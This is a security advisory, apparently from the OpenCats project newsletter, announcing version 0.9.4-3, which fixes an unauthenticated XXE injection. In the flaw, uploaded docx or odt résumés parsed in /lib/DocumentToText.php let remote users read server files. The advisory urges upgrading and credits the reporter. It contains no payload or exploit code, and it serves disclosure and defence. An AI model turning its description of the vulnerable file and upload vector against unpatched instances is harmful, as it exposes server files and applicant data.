0.9.4 Security update
Urgent Security release
In response to an XML External Entity (XXE) Injection vulnerability we have released OpenCats v0.9.4-3.
OpenCats suffers from an unauthenticated xml external entity injection that allows remote users to read files on the underlying operating system.
Date Reported: 28 Jun 2019
OpenCats XML External Entity (XXE) Injection
Remote users (job applicants) can upload docx or odt files to read files on the underlying operating system. A docx file will be used here, but odt files can be used as well since the same vulnerable functions in DocumentTotext.php are used to parse the files.
This problem has been fixed in version 0.9.4-3
We recommend that you upgrade your opencats instance asap.
If you wish to apply a fix instead, please view the changes which requries you to add a single line to /lib/DocumentToText.php
We are extremely grateful to Mark Ruther for finding this vulnerability and notifying the OpenCATS project.
If you have any questions regarding this security fix, please visit the User support forums or if you have found an issue with the code - then raise an issue on github
For an RSS reader, use this link to
If you'd prefer this newsletter going to your inbox, use a solution
similar to Blogtrottr which takes
an RSS feed and sends it to your email.
To find and read the previous newsletters, just use the
More frequent news
Follow us on Twitter for updates and information more frequently than